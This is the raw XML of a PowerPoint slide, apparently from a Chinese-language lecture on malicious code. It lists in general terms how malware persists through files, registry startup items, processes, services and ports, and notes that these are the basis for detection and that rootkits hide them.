                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DE6C059-B8C0-4C0B-8C51-9867A07225F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7453313" y="115888"/>
            <a:ext cx="863600" cy="1439862"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF6600"/>
          </a:solidFill>
          <a:ln w="12700" cap="sq">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert"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kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>目标系统之中</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>长期存活于</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>让自身</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287755" name="AutoShape 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D94F594F-3110-4A59-ACD4-B1F7E95830A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3024188" y="1381125"/>
            <a:ext cx="5735637" cy="5230813"/>
          </a:xfrm>
          <a:prstGeom prst="horizontalScroll">
            <a:avLst>
              <a:gd name="adj" fmla="val 12500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700" cap="sq">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ct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Char char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>静态存在形式</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文件（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exe,Dll</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>）</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启动项（修改注册表、各种启动文件</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>动态存在形式</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进程（自创进程或插入到其他进程之中）</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服务</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>端口（对外通信）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>以上也是恶意代码检测的基础和依据所在；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>而病毒本身也会对文件、启动项、进程、</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>端口、服务等进行隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>--〉</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>即</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>RootKit</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287756" name="AutoShape 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F233457-9BB2-4E71-BAA5-62B803E7D38A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1692275" y="3500438"/>
            <a:ext cx="1079500" cy="576262"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 46832"/>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7709" name="Line 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A094911E-5FF7-4397-8D69-BC7A20776C32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2124075" y="0"/>
            <a:ext cx="0" cy="1916113"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="0000FF"/>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mph" presetSubtype="0" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="6" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="287754"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:schemeClr val="bg1"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="287754"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:schemeClr val="bg1"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="287754"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="287754"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.on</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="true"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="10" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="11" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 3.61111E-6 1.50289E-6 C -0.00052 0.00925 -0.00035 0.01873 -0.00157 0.02774 C -0.00278 0.03815 -0.00973 0.04555 -0.01424 0.05364 C -0.02934 0.08069 -0.05278 0.10589 -0.07934 0.11144 C -0.09896 0.12532 -0.12032 0.13202 -0.14271 0.13526 C -0.1842 0.15491 -0.2132 0.16115 -0.25695 0.1711 C -0.29497 0.17988 -0.33403 0.17248 -0.37257 0.17318 C -0.39098 0.17757 -0.40955 0.1822 -0.42813 0.18497 C -0.45035 0.19422 -0.47587 0.19445 -0.49948 0.19699 C -0.50625 0.1993 -0.5132 0.20069 -0.51997 0.203 C -0.53733 0.21618 -0.51736 0.20277 -0.53907 0.2111 C -0.54879 0.2148 -0.55278 0.21873 -0.56285 0.22104 C -0.57188 0.22636 -0.57986 0.22728 -0.58993 0.2289 C -0.5967 0.23445 -0.60712 0.24046 -0.61511 0.24277 C -0.62743 0.25225 -0.64115 0.26127 -0.65486 0.26682 C -0.65643 0.26798 -0.65782 0.26959 -0.65955 0.27075 C -0.66094 0.27167 -0.66285 0.27167 -0.66424 0.2726 C -0.67049 0.27746 -0.6757 0.28532 -0.68177 0.29063 C -0.6875 0.3015 -0.68177 0.29248 -0.68976 0.30058 C -0.69618 0.30705 -0.69532 0.3126 -0.704 0.31653 C -0.70868 0.31861 -0.71823 0.32254 -0.71823 0.32277 C -0.7224 0.32786 -0.72674 0.33202 -0.72934 0.3385 C -0.73004 0.34011 -0.73004 0.34266 -0.73091 0.34428 C -0.73264 0.34798 -0.73542 0.35098 -0.73733 0.35445 C -0.73976 0.36693 -0.74532 0.3778 -0.74827 0.39029 C -0.74688 0.42728 -0.74688 0.4141 -0.74688 0.43029 " pathEditMode="relative" rAng="0" ptsTypes="fffffffffffffffffffffffffA">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="287754"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-37400" y="21500"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="13" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="14" presetID="55" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="287756"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="287756"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="287756"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="287756"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="19" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="20" presetID="12" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="287755">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="287755">
                                            <p:bg/>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87755">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="287755">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87755">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="287755">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287755">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="287755">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287755">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="287755">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>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287755">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="287755">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>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2" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="287755">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="287755">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="51" presetID="12" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="287755">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="287755">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>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287755">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="287755">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>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287755">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="287755">
                                            <p:txEl>
